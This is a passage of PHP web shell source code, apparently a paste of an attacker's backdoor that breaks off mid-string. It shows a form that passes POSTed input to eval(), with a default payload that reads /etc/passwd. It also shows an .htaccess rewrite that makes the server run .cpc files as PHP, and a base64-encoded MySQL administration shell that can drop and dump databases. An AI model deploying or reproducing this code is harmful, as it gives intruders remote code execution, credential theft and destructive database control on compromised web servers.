  725. <a href="?<?php echo "y=".$pwd; ?>&amp;x=logout">LogOut</a>
  726. </div></center>
  727. <!-- menu end -->
  728.  
  729. <?php
  730. @ini_set('display_errors', 0);
  731. if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
  732. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  733. <table class="cmdbox">
  734. <tr><td>
  735. <textarea class="output" name="cmd" id="cmd">
  736. <?php
  737. if(isset($_POST['submitcmd'])) {
  738.         echo eval(magicboom($_POST['cmd']));
  739. }
  740. else echo "echo file_get_contents('/etc/passwd');";
  741. ?>
  742. </textarea>
  743. <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
  744. </table>
  745. </form>
  746.  
  747. <?php }
  748.  
  749. elseif(isset($_GET['x']) && ($_GET['x'] == 'sql'))
  750.     {
  751.     ?>
  752. <form action="?y=<?php echo $pwd; ?>&amp;x=sql" method="post">
  753. <?php
  754. echo "<center/><br/><b><font color=red>MySQL Interface</font></b><br><br>";
  755.   mkdir('mysql', 0755);
  756.     chdir('mysql');
  757.         $akses = ".htaccess";
  758.         $buka_lah = "$akses";
  759.         $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!");
  760.         $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  761. AddType application/x-httpd-php .cpc
  762. ";    
  763.         fwrite ( $buka , $metin ) ;
  764.         fclose ($buka);
  765. $sqlshell = 'PD8NCiRQQVNTV09SRCA9ICJyb290X3hoYWhheCI7DQokVVNFUk5BTUUgPSAieGhhaGF4IjsNCmlmICggZnVuY3Rpb25fZXhpc3RzKCdpbmlfZ2V0JykgKSB7DQoJJG9ub2ZmID0gaW5pX2dldCgncmVnaXN0ZXJfZ2xvYmFscycpOw0KfSBlbHNlIHsNCgkkb25vZmYgPSBnZXRfY2ZnX3ZhcigncmVnaXN0ZXJfZ2xvYmFscycpOw0KfQ0KaWYgKCRvbm9mZiAhPSAxKSB7DQoJQGV4dHJhY3QoJEhUVFBfU0VSVkVSX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfQ09PS0lFX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfUE9TVF9GSUxFUywgRVhUUl9TS0lQKTsNCglAZXh0cmFjdCgkSFRUUF9QT1NUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfR0VUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfRU5WX1ZBUlMsIEVYVFJfU0tJUCk7DQp9DQoNCmZ1bmN0aW9uIGxvZ29uKCkgew0KCWdsb2JhbCAkUEhQX1NFTEY7DQoJc2V0Y29va2llKCAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKTsNCglzZXRjb29raWUoICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICk7DQoJZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgaGVpZ2h0PTEwMCU+PHRyPjx0ZD48Y2VudGVyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9Mj48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjx0YWJsZSBjZWxscGFkZGluZz0yMD48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjxoMT5NeVNRTCBJbnRlcmZhY2UgQnkgUzRNUDRIPC9oMT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Ykc5bmIyNWZjM1ZpYldsMD5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxwYWRkaW5nPTUgY2VsbHNwYWNpbmc9MT5cbiI7DQoJZWNobyAiPHRyPjx0ZCBjbGFzcz1cIm5ld1wiPkhvc3RuYW1lIDwvdGQ+PHRkPiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9aG9zdG5hbWUgdmFsdWU9J2xvY2FsaG9zdCc+PC90ZD48L3RyPlxuIjsNCgllY2hvICI8dHI+PHRkIGNsYXNzPVwibmV3XCI+VXNlcm5hbWUgPC90ZD48dGQ+IDxpbnB1dCB0eXBlPXRleHQgbmFtZT11c2VybmFtZT48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjx0cj48dGQgY2xhc3M9XCJuZXdcIj5QYXNzd29yZCA8L3RkPjx0ZD4gPGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzd29yZD48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nRW50ZXInPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1yZXNldCB2YWx1ZT0nQ2xlYXInPjxicj5cbiI7DQoJZWNobyAiPC9mb3JtPlxuIjsNCgllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJZWNobyAiPC9jZW50ZXI+PC90ZD48L3RyPjwvdGFibGU+XG4iOw0KCWVjaG8gIjxwPjxociB3aWR0aD0zMDA+XG4iOw0KCWVjaG8gIjwvY2VudGVyPjwvdGQ+PC90cj48L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbG9nb25fc3VibWl0KCkgew0KCWdsb2JhbCAkdXNlcm5hbWUsICRwYXNzd29yZCwgJGhvc3RuYW1lICwkUEhQX1NFTEY7DQoJaWYoJGhvc3RuYW1lID09JycpDQoJCSRob3N0bmFtZSA9ICdsb2NhbGhvc3QnOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl91c2VybmFtZSIsICR1c2VybmFtZSApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIsICRwYXNzd29yZCApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIsICRob3N0bmFtZSApOw0KCWVjaG8gIjxNRVRBIEhUVFAtRVFVSVY9UmVmcmVzaCBDT05URU5UPScwOyBVUkw9JFBIUF9TRUxGP2FjdGlvbj1iR2x6ZEVSQ2N3PT0nPiI7DQp9DQoNCmZ1bmN0aW9uIGVjaG9RdWVyeVJlc3VsdCgpIHsNCglnbG9iYWwgJHF1ZXJ5U3RyLCAkZXJyTXNnOw0KCWlmKCAkZXJyTXNnID09ICIiICkgJGVyck1zZyA9ICJTdWNjZXNzIjsNCglpZiggJHF1ZXJ5U3RyICE9ICIiICkgew0KCQllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9NT5cbiI7DQoJCWVjaG8gIjx0cj48dGQ+UXVlcnk8L3RkPjx0ZD4kcXVlcnlTdHI8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8dHI+PHRkPlJlc3VsdDwvdGQ+PHRkPiRlcnJNc2c8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8L3RhYmxlPjxwPlxuIjsNCgl9DQp9DQoNCmZ1bmN0aW9uIGxpc3REYXRhYmFzZXMoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJFBIUF9TRUxGOw0KCWVjaG8gIjxoMT5EYXRhYmFzZXMgTGlzdDwvaDE+XG4iOw0KCWVjaG8gIjxmb3JtIGFjdGlvbj0nJFBIUF9TRUxGJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWNyZWF0ZURCPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9ZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBEYXRhYmFzZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGhyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz01PlxuIjsNCgkkcERCID0gbXlzcWxfbGlzdF9kYnMoICRteXNxbEhhbmRsZSApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBEQiApOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRkYm5hbWUgPSBteXNxbF9kYm5hbWUoICRwREIsICRpICk7DQoJCWVjaG8gIjx0cj5cbiI7DQoJCWVjaG8gIjx0ZD4kZGJuYW1lPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWxpc3RUYWJsZXMmZGJuYW1lPSRkYm5hbWUnPlRhYmxlczwvYT48L3RkPlxuIjsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcERCJmRibmFtZT0kZGJuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgRGF0YWJhc2UgXCckZGJuYW1lXCc/JylcIj5Ecm9wPC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kdW1wREImZGJuYW1lPSRkYm5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHVtcCBEYXRhYmFzZSBcJyRkYm5hbWVcJz8nKVwiPkR1bXA8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gY3JlYXRlRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2NyZWF0ZV9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbGlzdERhdGFiYXNlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2Ryb3BfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCWxpc3REYXRhYmFzZXMoKTsNCn0NCg0KZnVuY3Rpb24gbGlzdFRhYmxlcygpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkUEhQX1NFTEY7DQoJZWNobyAiPGgxPlRhYmxlcyBMaXN0PC9oMT5cbiI7DQoJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Y3JlYXRlVGFibGU+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9dGFibGVuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBUYWJsZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9cXVlcnk+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IHNpemU9MTIwIG5hbWU9cXVlcnlTdHI+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUXVlcnknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBUYWJsZSA9IG15c3FsX2xpc3RfdGFibGVzKCAkZGJuYW1lICk7DQoJaWYoICRwVGFibGUgPT0gMCApIHsNCgkJJG1zZyAgPSBteXNxbF9lcnJvcigpOw0KCQllY2hvICI8aDM+RXJyb3IgOiAkbXNnPC9oMz48cD5cbiI7DQoJCXJldHVybjsNCgl9DQoJJG51bSA9IG15c3FsX251bV9yb3dzKCAkcFRhYmxlICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJHRhYmxlbmFtZSA9IG15c3FsX3RhYmxlbmFtZSggJHBUYWJsZSwgJGkgKTsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiJHRhYmxlbmFtZVxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5EYXRhPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5Ecm9wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHVtcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0R1bXAgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5EdW1wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPiI7DQp9DQoNCmZ1bmN0aW9uIGNyZWF0ZVRhYmxlKCkgew0KDQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkNSRUFURSBUQUJMRSAkdGFibGVuYW1lICggbm8gSU5UICkiOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbXlzcWxfcXVlcnkoICRxdWVyeVN0ciwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJbGlzdFRhYmxlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wVGFibGUoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkRST1AgVEFCTEUgJHRhYmxlbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCglsaXN0VGFibGVzKCk7DQp9DQoNCmZ1bmN0aW9uIHZpZXdTY2hlbWEoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJZWNobyAiPGgxPlRhYmxlIFNjaGVtYTwvaDE+XG4iOw0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvUXVlcnlSZXN1bHQoKTsNCgllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWFkZEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRmllbGQ8L2E+IHwgXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5WaWV3IERhdGE8L2E+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgIlNIT1cgZmllbGRzIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+RmllbGQ8L3RoPlxuIjsNCgllY2hvICI8dGg+VHlwZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5OdWxsPC90aD5cbiI7DQoJZWNobyAiPHRoPktleTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5EZWZhdWx0PC90aD5cbiI7DQoJZWNobyAiPHRoPkV4dHJhPC90aD5cbiI7DQoJZWNobyAiPHRoIGNvbHNwYW49Mj5BY3Rpb248L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCg0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2FycmF5KCAkcFJlc3VsdCApOw0KCQllY2hvICI8dHI+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIkZpZWxkIl0uIjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIlR5cGUiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiTnVsbCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJLZXkiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiRGVmYXVsdCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJFeHRyYSJdLiI8L3RkPlxuIjsNCgkJJGZpZWxkbmFtZSA9ICRmaWVsZFsiRmllbGQiXTsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZWRpdEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJmZpZWxkbmFtZT0kZmllbGRuYW1lJz5FZGl0PC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kcm9wRmllbGQmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmZmllbGRuYW1lPSRmaWVsZG5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHJvcCBGaWVsZCBcJyRmaWVsZG5hbWVcJz8nKVwiPkRyb3A8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbWFuYWdlRmllbGQoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBGaWVsZDwvaDE+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aDE+RWRpdCBGaWVsZDwvaDE+XG4iOw0KCQkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCQkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCQkkZmllbGQgPSBteXNxbF9mZXRjaF9hcnJheSggJHBSZXN1bHQgKTsNCgkJCWlmKCAkZmllbGRbIkZpZWxkIl0gPT0gJGZpZWxkbmFtZSApIHsNCgkJCQkkZmllbGR0eXBlID0gJGZpZWxkWyJUeXBlIl07DQoJCQkJJGZpZWxka2V5ID0gJGZpZWxkWyJLZXkiXTsNCgkJCQkkZmllbGRleHRyYSA9ICRmaWVsZFsiRXh0cmEiXTsNCgkJCQkkZmllbGRudWxsID0gJGZpZWxkWyJOdWxsIl07DQoJCQkJJGZpZWxkZGVmYXVsdCA9ICRmaWVsZFsiRGVmYXVsdCJdOw0KCQkJCWJyZWFrOw0KCQkJfQ0KCQl9DQoNCgkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCWlmKCBzdHJwb3MoICRmaWVsZHR5cGUsICIoIiApICkgew0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCSR2YWx1ZWxpc3QgPSBzdHJ0b2soICIgKClcbiIgKTsNCgkJCX0gZWxzZSB7DQoJCQkJJE0gPSBzdHJ0b2soICIgKCwpXG4iICk7DQoJCQkJaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgIiwiICkgKQ0KCQkJCQkkRCA9IHN0cnRvayggIiAoLClcbiIgKTsNCgkJCX0NCgkJfQ0KCX0NCg0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JFBIUF9TRUxGPlxuIjsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1hZGRGaWVsZF9zdWJtaXQ+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9ZWRpdEZpZWxkX3N1Ym1pdD5cbiI7DQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPW9sZF9uYW1lIHZhbHVlPSRmaWVsZG5hbWU+XG4iOw0KCX0NCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kYm5hbWUgdmFsdWU9JGRibmFtZT5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9dGFibGVuYW1lIHZhbHVlPSR0YWJsZW5hbWU+XG4iOw0KCWVjaG8gIjxoMz5OYW1lPC9oMz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBuYW1lPW5hbWUgdmFsdWU9JGZpZWxkbmFtZT48cD5cbiI7DQoJZWNobyAnDQoNCjxoMz5UeXBlPC9oMz4NCjxmb250IHNpemU9MiBjbGFzcz0ibmV3Ij4NCiogYE1cJyBpbmRpY2F0ZXMgdGhlIG1heGltdW0gZGlzcGxheSBzaXplLjxicj4NCiogYERcJyBhcHBsaWVzIHRvIGZsb2F0aW5nLXBvaW50IHR5cGVzIGFuZCBpbmRpY2F0ZXMgdGhlIG51bWJlciBvZiBkaWdpdHMgZm9sbG93aW5nIHRoZSBkZWNpbWFsIHBvaW50Ljxicj4NCjwvZm9udD4NCjx0YWJsZT4NCjx0cj4NCjx0aD5UeXBlPC90aD48dGg+Jm5ic3BNJm5ic3A8L3RoPjx0aD4mbmJzcEQmbmJzcDwvdGg+PHRoPnVuc2lnbmVkPC90aD48dGg+emVyb2ZpbGw8L3RoPjx0aD5iaW5hcnk8L3RoPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllJTlQiICc7IGlmKCAkdHlwZSA9PSAidGlueWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElOWUlOVCAoLTEyOCB+IDEyNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iU01BTExJTlQiICc7IGlmKCAkdHlwZSA9PSAic21hbGxpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNNQUxMSU5UICgtMzI3NjggfiAzMjc2Nyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNSU5UIiAnOyBpZiggJHR5cGUgPT0gIm1lZGl1bWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNSU5UICgtODM4ODYwOCB+IDgzODg2MDcpPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IklOVCIgJzsgaWYoICR0eXBlID09ICJpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPklOVCAoLTIxNDc0ODM2NDggfiAyMTQ3NDgzNjQ3KTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJCSUdJTlQiICc7IGlmKCAkdHlwZSA9PSAiYmlnaW50IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CSUdJTlQgKC05MjIzMzcyMDM2ODU0Nzc1ODA4IH4gOTIyMzM3MjAzNjg1NDc3NTgwNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iRkxPQVQiICc7IGlmKCAkdHlwZSA9PSAiZmxvYXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkZMT0FUPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkRPVUJMRSIgJzsgaWYoICR0eXBlID09ICJkb3VibGUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRPVUJMRTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD